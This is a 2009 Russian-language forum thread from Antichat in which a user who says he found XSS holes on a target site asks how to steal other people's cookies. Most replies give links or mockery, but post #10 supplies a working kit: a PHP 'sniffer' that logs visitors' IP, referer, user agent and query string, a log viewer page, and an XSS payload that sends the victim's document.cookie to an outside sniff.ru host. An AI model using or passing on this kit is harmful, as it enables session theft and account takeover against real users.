HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Куки
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Куки
  #1  
Старый 12.07.2009, 16:58
Badak
Участник форума
Регистрация: 06.07.2009
Сообщений: 214
С нами: 8867637

Репутация: 27
По умолчанию Куки
Все доброго времени суток.Ребята,подскажите как мне чужие куки забирать.Заранее спасибо
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 12.07.2009, 17:19
Badak
Участник форума
Регистрация: 06.07.2009
Сообщений: 214
С нами: 8867637

Репутация: 27
По умолчанию
Я нашел XSS,что дальше?:Р
 
Ответить с цитированием

  #3  
Старый 12.07.2009, 17:24
Inotsee
Новичок
Регистрация: 24.06.2009
Сообщений: 18
С нами: 8884502

Репутация: 3
По умолчанию
Издеваешься? Знаешь как найти XSS и не знаешь как запрос составить? Составь запрос, дай жертве ссылку и лови его куки на сниффере.
 
Ответить с цитированием

  #4  
Старый 12.07.2009, 17:26
Badak
Участник форума
Регистрация: 06.07.2009
Сообщений: 214
С нами: 8867637

Репутация: 27
По умолчанию
Я не издеваюсь))Я знаю как XSS найти уже на нужном сайте нашел 23,а как запрос составить и что дальше делать понятия не имею,но хочу научиться
 
Ответить с цитированием

  #5  
Старый 12.07.2009, 17:30
br3k
Участник форума
Регистрация: 19.09.2007
Сообщений: 163
С нами: 9812443

Репутация: 327
По умолчанию
XSS
_ttp://hackzona.ru/hz.php?name=News&file=article&sid=5005
_ttp://www.cgisecurity.com/articles/dx27.html
_ttp://ha.ckers.org/xss.html
_ttp://forum.antichat.ru/thread20140.html
_ttp://forum.antichat.ru/thread8038.html
_ttp://forum.antichat.ru/thread7124-XSS+FAQ.html
К изучению.
 
Ответить с цитированием

  #6  
Старый 12.07.2009, 17:32
Aikaram
Постоянный
Регистрация: 08.06.2009
Сообщений: 509
С нами: 8908226

Репутация: 766


По умолчанию
иди лучше книжки почитай, которые на лето задали. а то все куки да куки.
 
Ответить с цитированием

  #7  
Старый 12.07.2009, 17:35
Badak
Участник форума
Регистрация: 06.07.2009
Сообщений: 214
С нами: 8867637

Репутация: 27
По умолчанию
Тебе выдали ты иди и читай
 
Ответить с цитированием

  #8  
Старый 12.07.2009, 18:40
Badak
Участник форума
Регистрация: 06.07.2009
Сообщений: 214
С нами: 8867637

Репутация: 27
По умолчанию
Может мне кто-то ответить?!Что делать после того как нашел XSS?
 
Ответить с цитированием

  #9  
Старый 12.07.2009, 18:43
Flegmatique
Banned
Регистрация: 06.07.2009
Сообщений: 29
С нами: 8867268

Репутация: 43
По умолчанию
ссылки тебе дали, читай и действуй
жевать за тебя никто не будет
 
Ответить с цитированием

  #10  
Старый 12.07.2009, 19:18
Failure
Участник форума
Регистрация: 21.09.2008
Сообщений: 148
С нами: 9282050

Репутация: 102
По умолчанию
sniff.php
PHP код:
<?php
$ip=$_SERVER["REMOTE_ADDR"];
$ref=$_SERVER["HTTP_REFERER"];
$ua=$_SERVER["HTTP_USER_AGENT"];
$q=$_SERVER["QUERY_STRING"];
if($ref == "") {
$str "<b>$ip</b>  | Нет HTTP реферера | <br>Юзает: $ua |<br>QUERY_STRING: $q |<br>======================================================================================================";
}
else {$str "<b>$ip</b>  | Пришел с :  <a href=$ref>$ref</a> | <br>Юзает: $ua |<br>QUERY_STRING:   $q   |<br>======================================================================================================";}

$file=fopen("log.txt","a+");
fwrite($file,"$str<br>");
fclose($file);
?>
<img src="http://img1.liveinternet.ru/images/attach/b/3/28/251/28251827_novoe.jpg">
log.php:
PHP код:
<?php
echo "<html>
<body>
<meta http-equiv; charset=windows-1251>
<title>WEB Sniffer</title>
<body bgcolor=black style=color:red>
<h1>WEB SNIFFER</h1>
<input type=submit value='Обновить' onClick=javascript:window.location='log.php'>
</form>
<br><br><br>
======================================================================================================<br>";
if(file_exists("log.txt"))
require "log.txt";
echo "<br></body></html>";
?>
http://site.ru/folder/[XSS]="><script>window.location='http://sniff.ru/sniff.php?'+document.cookie;</script>
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как подменить куки F.A.Q [R3x] Уязвимости CMS / форумов 4 09.03.2007 12:54
Phpbb2 0.16 можно ли через куки получить доступ к админке? HAMANN Уязвимости CMS / форумов 3 20.11.2006 01:25
Не получаеться подменить куки для форума PhpBB 2.0.17 Astro Уязвимости CMS / форумов 10 21.02.2006 23:01



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...